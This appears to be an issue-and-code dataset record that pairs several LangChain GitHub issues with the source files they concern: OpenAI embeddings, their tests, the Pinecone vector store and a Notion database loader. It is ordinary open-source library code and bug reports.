"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator(pre=True)
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
default_api_version = "2022-12-01"
# Azure OpenAI embedding models allow a maximum of 16 texts
# at a time in each batch
# See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings
default_chunk_size = 16
else:
default_api_version = ""
default_chunk_size = 1000
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
if "chunk_size" not in values:
values["chunk_size"] = default_chunk_size
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_api_type in ("azure", "azure_ad", "azuread"):
openai_args["engine"] = self.deployment
if self.openai_proxy:
try:
import openai
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
} # type: ignore[assignment] # noqa: E501
return openai_args
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
def _get_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
if self.show_progress_bar:
try:
from tqdm.auto import tqdm
_iter = tqdm(range(0, len(tokens), _chunk_size))
except ImportError:
_iter = range(0, len(tokens), _chunk_size)
else:
_iter = range(0, len(tokens), _chunk_size)
for i in _iter:
response = embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
if self.skip_empty and len(batched_embeddings[i]) == 1:
continue
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = embed_with_retry(
self,
input="",
**self._invocation_params,
)["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
async def _aget_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
for i in range(0, len(tokens), _chunk_size):
response = await async_embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = (
await async_embed_with_retry(
self,
input="",
**self._invocation_params,
)
)["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
return self._get_len_safe_embeddings(texts, engine=self.deployment)
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
return await self._aget_len_safe_embeddings(texts, engine=self.deployment)
def embed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
return self.embed_documents([text])[0]
async def aembed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embeddings = await self.aembed_documents([text])
return embeddings[0]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,943 | OpenAIEmbeddings() does not work because of these bugs | ### System Info
Python Version: 3.11
LangChain Version: 0.0.331
OpenAI Version: 1.0.0
### Who can help?
@hwchase17, @agola11, @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
The following error has been caused due to the recent change in version of OpenAI to 1.0.0
**Use OpenAI==0.28.1 to fix this error**
With the code:
`embeddings = OpenAIEmbeddings()`
The error produced is:
`AttributeError: module 'openai' has no attribute 'Embedding'. Did you mean: 'embeddings'?`
I went through the `langchain/embeddings/openai.py` file and then changed `value["client"] = openai.Embedding` to `value["client"] = openai.embeddings`, but then I receive this new error:
`AttributeError: module 'openai' has no attribute 'error'` in the same file (`langchain/embeddings/openai.py`)
### Expected behavior
There should be no error when calling this function. | https://github.com/langchain-ai/langchain/issues/12943 | https://github.com/langchain-ai/langchain/pull/12969 | fdbb45d79e69485e0892dadf48b32dc8efadde9b | 0c81cd923e04bb68fdf3ad299946d7fa85a21f9f | "2023-11-06T17:56:29Z" | python | "2023-11-07T02:52:33Z" | libs/langchain/tests/integration_tests/embeddings/test_openai.py | """Test openai embeddings."""
import os
import numpy as np
import openai
import pytest
from langchain.embeddings.openai import OpenAIEmbeddings
@pytest.mark.scheduled
def test_openai_embedding_documents() -> None:
"""Test openai embeddings."""
documents = ["foo bar"]
embedding = OpenAIEmbeddings()
output = embedding.embed_documents(documents)
assert len(output) == 1
assert len(output[0]) == 1536
@pytest.mark.scheduled
def test_openai_embedding_documents_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = OpenAIEmbeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = embedding.embed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
@pytest.mark.scheduled
@pytest.mark.asyncio
async def test_openai_embedding_documents_async_multiple() -> None:
"""Test openai embeddings."""
documents = ["foo bar", "bar foo", "foo"]
embedding = OpenAIEmbeddings(chunk_size=2)
embedding.embedding_ctx_length = 8191
output = await embedding.aembed_documents(documents)
assert len(output) == 3
assert len(output[0]) == 1536
assert len(output[1]) == 1536
assert len(output[2]) == 1536
@pytest.mark.scheduled
def test_openai_embedding_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = OpenAIEmbeddings()
output = embedding.embed_query(document)
assert len(output) == 1536
@pytest.mark.scheduled
@pytest.mark.asyncio
async def test_openai_embedding_async_query() -> None:
"""Test openai embeddings."""
document = "foo bar"
embedding = OpenAIEmbeddings()
output = await embedding.aembed_query(document)
assert len(output) == 1536
@pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.")
@pytest.mark.scheduled
def test_openai_embedding_with_empty_string() -> None:
"""Test openai embeddings with empty string."""
document = ["", "abc"]
embedding = OpenAIEmbeddings()
output = embedding.embed_documents(document)
assert len(output) == 2
assert len(output[0]) == 1536
expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[
"data"
][0]["embedding"]
assert np.allclose(output[0], expected_output)
assert len(output[1]) == 1536
@pytest.mark.scheduled
def test_embed_documents_normalized() -> None:
output = OpenAIEmbeddings().embed_documents(["foo walked to the market"])
assert np.isclose(np.linalg.norm(output[0]), 1.0)
@pytest.mark.scheduled
def test_embed_query_normalized() -> None:
output = OpenAIEmbeddings().embed_query("foo walked to the market")
assert np.isclose(np.linalg.norm(output), 1.0)
def test_azure_openai_embeddings() -> None:
from openai import error
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-03-15-preview"
embeddings = OpenAIEmbeddings(deployment="your-embeddings-deployment-name")
text = "This is a test document."
try:
embeddings.embed_query(text)
except error.InvalidRequestError as e:
if "Must provide an 'engine' or 'deployment_id' parameter" in str(e):
assert (
False
), "deployment was provided to but openai.Embeddings didn't get it."
except Exception:
# Expected to fail because endpoint doesn't exist.
pass
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,207 | Issue: Pinecone retriever with Cosine Similarity is treated like Cosine Distance | ### Issue you'd like to raise.
When using document search from the existing Pinecone index that was created using Cosine **Similarity** in the `ConversationalRetrievalChain`, the `score_theshold` would eliminate most relevant documents instead of least relevant ones because the _similarity_ metric will be converted to _distance_.
In [_select_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/pinecone.py#L172) it calls the [_cosine_relevance_score_fn](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L169) - which converts the similarity returned from Pinecone search to distance.
Then, [filtering the documents](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/base.py#L266) based on the `score_threshold` eliminates the most relevant documents instead of least relevant ones.
### Suggestion:
Pinecone subclass should override the `_cosine_relevance_score_fn` to preserve the similarity, since it is what originally comes back from the Pinecone similarity search. | https://github.com/langchain-ai/langchain/issues/8207 | https://github.com/langchain-ai/langchain/pull/8920 | 2e42ed5de68d27fe0ce676aae0cdaae778fcf16c | ff19a62afc2c8d6d9e705bd0af5ffad426263f49 | "2023-07-24T22:23:33Z" | python | "2023-11-13T19:47:38Z" | libs/langchain/langchain/vectorstores/pinecone.py | from __future__ import annotations
import logging
import uuid
import warnings
from typing import TYPE_CHECKING, Any, Callable, Iterable, List, Optional, Tuple, Union
import numpy as np
from langchain.docstore.document import Document
from langchain.schema.embeddings import Embeddings
from langchain.schema.vectorstore import VectorStore
from langchain.utils.iter import batch_iterate
from langchain.vectorstores.utils import DistanceStrategy, maximal_marginal_relevance
if TYPE_CHECKING:
from pinecone import Index
logger = logging.getLogger(__name__)
class Pinecone(VectorStore):
"""`Pinecone` vector store.
To use, you should have the ``pinecone-client`` python package installed.
Example:
.. code-block:: python
from langchain.vectorstores import Pinecone
from langchain.embeddings.openai import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
index = pinecone.Index("langchain-demo")
embeddings = OpenAIEmbeddings()
vectorstore = Pinecone(index, embeddings.embed_query, "text")
"""
def __init__(
self,
index: Any,
embedding: Union[Embeddings, Callable],
text_key: str,
namespace: Optional[str] = None,
distance_strategy: Optional[DistanceStrategy] = DistanceStrategy.COSINE,
):
"""Initialize with Pinecone client."""
try:
import pinecone
except ImportError:
raise ImportError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
if not isinstance(embedding, Embeddings):
warnings.warn(
"Passing in `embedding` as a Callable is deprecated. Please pass in an"
" Embeddings object instead."
)
if not isinstance(index, pinecone.index.Index):
raise ValueError(
f"client should be an instance of pinecone.index.Index, "
f"got {type(index)}"
)
self._index = index
self._embedding = embedding
self._text_key = text_key
self._namespace = namespace
self.distance_strategy = distance_strategy
@property
def embeddings(self) -> Optional[Embeddings]:
"""Access the query embedding object if available."""
if isinstance(self._embedding, Embeddings):
return self._embedding
return None
def _embed_documents(self, texts: Iterable[str]) -> List[List[float]]:
"""Embed search docs."""
if isinstance(self._embedding, Embeddings):
return self._embedding.embed_documents(list(texts))
return [self._embedding(t) for t in texts]
def _embed_query(self, text: str) -> List[float]:
"""Embed query text."""
if isinstance(self._embedding, Embeddings):
return self._embedding.embed_query(text)
return self._embedding(text)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
namespace: Optional[str] = None,
batch_size: int = 32,
embedding_chunk_size: int = 1000,
**kwargs: Any,
) -> List[str]:
"""Run more texts through the embeddings and add to the vectorstore.
Upsert optimization is done by chunking the embeddings and upserting them.
This is done to avoid memory issues and optimize using HTTP based embeddings.
For OpenAI embeddings, use pool_threads>4 when constructing the pinecone.Index,
embedding_chunk_size>1000 and batch_size~64 for best performance.
Args:
texts: Iterable of strings to add to the vectorstore.
metadatas: Optional list of metadatas associated with the texts.
ids: Optional list of ids to associate with the texts.
namespace: Optional pinecone namespace to add the texts to.
batch_size: Batch size to use when adding the texts to the vectorstore.
embedding_chunk_size: Chunk size to use when embedding the texts.
Returns:
List of ids from adding the texts into the vectorstore.
"""
if namespace is None:
namespace = self._namespace
texts = list(texts)
ids = ids or [str(uuid.uuid4()) for _ in texts]
metadatas = metadatas or [{} for _ in texts]
for metadata, text in zip(metadatas, texts):
metadata[self._text_key] = text
# For loops to avoid memory issues and optimize when using HTTP based embeddings
# The first loop runs the embeddings, it benefits when using OpenAI embeddings
# The second loops runs the pinecone upsert asynchronously.
for i in range(0, len(texts), embedding_chunk_size):
chunk_texts = texts[i : i + embedding_chunk_size]
chunk_ids = ids[i : i + embedding_chunk_size]
chunk_metadatas = metadatas[i : i + embedding_chunk_size]
embeddings = self._embed_documents(chunk_texts)
async_res = [
self._index.upsert(
vectors=batch,
namespace=namespace,
async_req=True,
**kwargs,
)
for batch in batch_iterate(
batch_size, zip(chunk_ids, embeddings, chunk_metadatas)
)
]
[res.get() for res in async_res]
return ids
def similarity_search_with_score(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to query, along with scores.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
return self.similarity_search_by_vector_with_score(
self._embed_query(query), k=k, filter=filter, namespace=namespace
)
def similarity_search_by_vector_with_score(
self,
embedding: List[float],
*,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
) -> List[Tuple[Document, float]]:
"""Return pinecone documents most similar to embedding, along with scores."""
if namespace is None:
namespace = self._namespace
docs = []
results = self._index.query(
[embedding],
top_k=k,
include_metadata=True,
namespace=namespace,
filter=filter,
)
for res in results["matches"]:
metadata = res["metadata"]
if self._text_key in metadata:
text = metadata.pop(self._text_key)
score = res["score"]
docs.append((Document(page_content=text, metadata=metadata), score))
else:
logger.warning(
f"Found document with no `{self._text_key}` key. Skipping."
)
return docs
def similarity_search(
self,
query: str,
k: int = 4,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return pinecone documents most similar to query.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
filter: Dictionary of argument(s) to filter on metadata
namespace: Namespace to search in. Default will search in '' namespace.
Returns:
List of Documents most similar to the query and score for each
"""
docs_and_scores = self.similarity_search_with_score(
query, k=k, filter=filter, namespace=namespace, **kwargs
)
return [doc for doc, _ in docs_and_scores]
def _select_relevance_score_fn(self) -> Callable[[float], float]:
"""
The 'correct' relevance function
may differ depending on a few things, including:
- the distance / similarity metric used by the VectorStore
- the scale of your embeddings (OpenAI's are unit normed. Many others are not!)
- embedding dimensionality
- etc.
"""
if self.distance_strategy == DistanceStrategy.COSINE:
return self._cosine_relevance_score_fn
elif self.distance_strategy == DistanceStrategy.MAX_INNER_PRODUCT:
return self._max_inner_product_relevance_score_fn
elif self.distance_strategy == DistanceStrategy.EUCLIDEAN_DISTANCE:
return self._euclidean_relevance_score_fn
else:
raise ValueError(
"Unknown distance strategy, must be cosine, max_inner_product "
"(dot product), or euclidean"
)
def max_marginal_relevance_search_by_vector(
self,
embedding: List[float],
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
embedding: Embedding to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
Returns:
List of Documents selected by maximal marginal relevance.
"""
if namespace is None:
namespace = self._namespace
results = self._index.query(
[embedding],
top_k=fetch_k,
include_values=True,
include_metadata=True,
namespace=namespace,
filter=filter,
)
mmr_selected = maximal_marginal_relevance(
np.array([embedding], dtype=np.float32),
[item["values"] for item in results["matches"]],
k=k,
lambda_mult=lambda_mult,
)
selected = [results["matches"][i]["metadata"] for i in mmr_selected]
return [
Document(page_content=metadata.pop((self._text_key)), metadata=metadata)
for metadata in selected
]
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[dict] = None,
namespace: Optional[str] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query: Text to look up documents similar to.
k: Number of Documents to return. Defaults to 4.
fetch_k: Number of Documents to fetch to pass to MMR algorithm.
lambda_mult: Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
Returns:
List of Documents selected by maximal marginal relevance.
"""
embedding = self._embed_query(query)
return self.max_marginal_relevance_search_by_vector(
embedding, k, fetch_k, lambda_mult, filter, namespace
)
@classmethod
def get_pinecone_index(
cls,
index_name: Optional[str],
pool_threads: int = 4,
) -> Index:
"""Return a Pinecone Index instance.
Args:
index_name: Name of the index to use.
pool_threads: Number of threads to use for index upsert.
Returns:
Pinecone Index instance."""
try:
import pinecone
except ImportError:
raise ValueError(
"Could not import pinecone python package. "
"Please install it with `pip install pinecone-client`."
)
indexes = pinecone.list_indexes() # checks if provided index exists
if index_name in indexes:
index = pinecone.Index(index_name, pool_threads=pool_threads)
elif len(indexes) == 0:
raise ValueError(
"No active indexes found in your Pinecone project, "
"are you sure you're using the right Pinecone API key and Environment? "
"Please double check your Pinecone dashboard."
)
else:
raise ValueError(
f"Index '{index_name}' not found in your Pinecone project. "
f"Did you mean one of the following indexes: {', '.join(indexes)}"
)
return index
@classmethod
def from_texts(
cls,
texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
batch_size: int = 32,
text_key: str = "text",
namespace: Optional[str] = None,
index_name: Optional[str] = None,
upsert_kwargs: Optional[dict] = None,
pool_threads: int = 4,
embeddings_chunk_size: int = 1000,
**kwargs: Any,
) -> Pinecone:
"""Construct Pinecone wrapper from raw documents.
This is a user friendly interface that:
1. Embeds documents.
2. Adds the documents to a provided Pinecone index
This is intended to be a quick way to get started.
The `pool_threads` affects the speed of the upsert operations.
Example:
.. code-block:: python
from langchain.vectorstores import Pinecone
from langchain.embeddings import OpenAIEmbeddings
import pinecone
# The environment should be the one specified next to the API key
# in your Pinecone console
pinecone.init(api_key="***", environment="...")
embeddings = OpenAIEmbeddings()
pinecone = Pinecone.from_texts(
texts,
embeddings,
index_name="langchain-demo"
)
"""
pinecone_index = cls.get_pinecone_index(index_name, pool_threads)
pinecone = cls(pinecone_index, embedding, text_key, namespace, **kwargs)
pinecone.add_texts(
texts,
metadatas=metadatas,
ids=ids,
namespace=namespace,
batch_size=batch_size,
embedding_chunk_size=embeddings_chunk_size,
**(upsert_kwargs or {}),
)
return pinecone
@classmethod
def from_existing_index(
cls,
index_name: str,
embedding: Embeddings,
text_key: str = "text",
namespace: Optional[str] = None,
pool_threads: int = 4,
) -> Pinecone:
"""Load pinecone vectorstore from index name."""
pinecone_index = cls.get_pinecone_index(index_name, pool_threads)
return cls(pinecone_index, embedding, text_key, namespace)
def delete(
self,
ids: Optional[List[str]] = None,
delete_all: Optional[bool] = None,
namespace: Optional[str] = None,
filter: Optional[dict] = None,
**kwargs: Any,
) -> None:
"""Delete by vector IDs or filter.
Args:
ids: List of ids to delete.
filter: Dictionary of conditions to filter vectors to delete.
"""
if namespace is None:
namespace = self._namespace
if delete_all:
self._index.delete(delete_all=True, namespace=namespace, **kwargs)
elif ids is not None:
chunk_size = 1000
for i in range(0, len(ids), chunk_size):
chunk = ids[i : i + chunk_size]
self._index.delete(ids=chunk, namespace=namespace, **kwargs)
elif filter is not None:
self._index.delete(filter=filter, namespace=namespace, **kwargs)
else:
raise ValueError("Either ids, delete_all, or filter must be provided.")
return None
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 13,356 | Issue: Notion DB loader for doesn't supports some properties | ### Issue you'd like to raise.
notion page properties
https://developers.notion.com/reference/page-property-values
Current version Notion DB loader for doesn't supports following properties for metadata
- `checkbox`
- `email`
- `number`
- `select`
### Suggestion:
I would like to make a PR to fix this issue if it's okay. | https://github.com/langchain-ai/langchain/issues/13356 | https://github.com/langchain-ai/langchain/pull/13358 | c9b9359647f1f1b24f106b93f180509db7932950 | 3b5e8bacfa6d5b7c223cb93f09c6c21d39542b43 | "2023-11-14T17:20:22Z" | python | "2023-11-15T04:31:12Z" | libs/langchain/langchain/document_loaders/notiondb.py | from typing import Any, Dict, List, Optional
import requests
from langchain.docstore.document import Document
from langchain.document_loaders.base import BaseLoader
NOTION_BASE_URL = "https://api.notion.com/v1"
DATABASE_URL = NOTION_BASE_URL + "/databases/{database_id}/query"
PAGE_URL = NOTION_BASE_URL + "/pages/{page_id}"
BLOCK_URL = NOTION_BASE_URL + "/blocks/{block_id}/children"
class NotionDBLoader(BaseLoader):
"""Load from `Notion DB`.
Reads content from pages within a Notion Database.
Args:
integration_token (str): Notion integration token.
database_id (str): Notion database id.
request_timeout_sec (int): Timeout for Notion requests in seconds.
Defaults to 10.
"""
def __init__(
self,
integration_token: str,
database_id: str,
request_timeout_sec: Optional[int] = 10,
) -> None:
"""Initialize with parameters."""
if not integration_token:
raise ValueError("integration_token must be provided")
if not database_id:
raise ValueError("database_id must be provided")
self.token = integration_token
self.database_id = database_id
self.headers = {
"Authorization": "Bearer " + self.token,
"Content-Type": "application/json",
"Notion-Version": "2022-06-28",
}
self.request_timeout_sec = request_timeout_sec
def load(self) -> List[Document]:
"""Load documents from the Notion database.
Returns:
List[Document]: List of documents.
"""
page_summaries = self._retrieve_page_summaries()
return list(self.load_page(page_summary) for page_summary in page_summaries)
def _retrieve_page_summaries(
self, query_dict: Dict[str, Any] = {"page_size": 100}
) -> List[Dict[str, Any]]:
"""Get all the pages from a Notion database."""
pages: List[Dict[str, Any]] = []
while True:
data = self._request(
DATABASE_URL.format(database_id=self.database_id),
method="POST",
query_dict=query_dict,
)
pages.extend(data.get("results"))
if not data.get("has_more"):
break
query_dict["start_cursor"] = data.get("next_cursor")
return pages
def load_page(self, page_summary: Dict[str, Any]) -> Document:
"""Read a page.
Args:
page_summary: Page summary from Notion API.
"""
page_id = page_summary["id"]
# load properties as metadata
metadata: Dict[str, Any] = {}
for prop_name, prop_data in page_summary["properties"].items():
prop_type = prop_data["type"]
if prop_type == "rich_text":
value = (
prop_data["rich_text"][0]["plain_text"]
if prop_data["rich_text"]
else None
)
elif prop_type == "title":
value = (
prop_data["title"][0]["plain_text"] if prop_data["title"] else None
)
elif prop_type == "multi_select":
value = (
[item["name"] for item in prop_data["multi_select"]]
if prop_data["multi_select"]
else []
)
elif prop_type == "url":
value = prop_data["url"]
elif prop_type == "unique_id":
value = (
f'{prop_data["unique_id"]["prefix"]}-{prop_data["unique_id"]["number"]}'
if prop_data["unique_id"]
else None
)
elif prop_type == "status":
value = prop_data["status"]["name"] if prop_data["status"] else None
elif prop_type == "people":
value = (
[item["name"] for item in prop_data["people"]]
if prop_data["people"]
else []
)
elif prop_type == "date":
value = prop_data["date"] if prop_data["date"] else None
elif prop_type == "last_edited_time":
value = (
prop_data["last_edited_time"]
if prop_data["last_edited_time"]
else None
)
elif prop_type == "created_time":
value = prop_data["created_time"] if prop_data["created_time"] else None
else:
value = None
metadata[prop_name.lower()] = value
metadata["id"] = page_id
return Document(page_content=self._load_blocks(page_id), metadata=metadata)
def _load_blocks(self, block_id: str, num_tabs: int = 0) -> str:
"""Read a block and its children."""
result_lines_arr: List[str] = []
cur_block_id: str = block_id
while cur_block_id:
data = self._request(BLOCK_URL.format(block_id=cur_block_id))
for result in data["results"]:
result_obj = result[result["type"]]
if "rich_text" not in result_obj:
continue
cur_result_text_arr: List[str] = []
for rich_text in result_obj["rich_text"]:
if "text" in rich_text:
cur_result_text_arr.append(
"\t" * num_tabs + rich_text["text"]["content"]
)
if result["has_children"]:
children_text = self._load_blocks(
result["id"], num_tabs=num_tabs + 1
)
cur_result_text_arr.append(children_text)
result_lines_arr.append("\n".join(cur_result_text_arr))
cur_block_id = data.get("next_cursor")
return "\n".join(result_lines_arr)
def _request(
self, url: str, method: str = "GET", query_dict: Dict[str, Any] = {}
) -> Any:
res = requests.request(
method,
url,
headers=self.headers,
json=query_dict,
timeout=self.request_timeout_sec,
)
res.raise_for_status()
return res.json()
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 9,696 | No way to Close an open connection in PGVector.py | ### Feature request
Initialization with Database Connection: When an instance of the PGVector class is created, it automatically establish a connection with the PostgreSQL Vector database.
Method for Closing Connection: we need to implement a method within the PGVector class that allows you to close the established connection with the PostgreSQL database.
`def __del__(self):
# Close the session (and thus the connection) when the instance is destroyed.
self.session.close()`
### Motivation
The problem is, I am unable to close a connection and the pool get overload with multiple connections and hence the service starts throwing error
### Your contribution
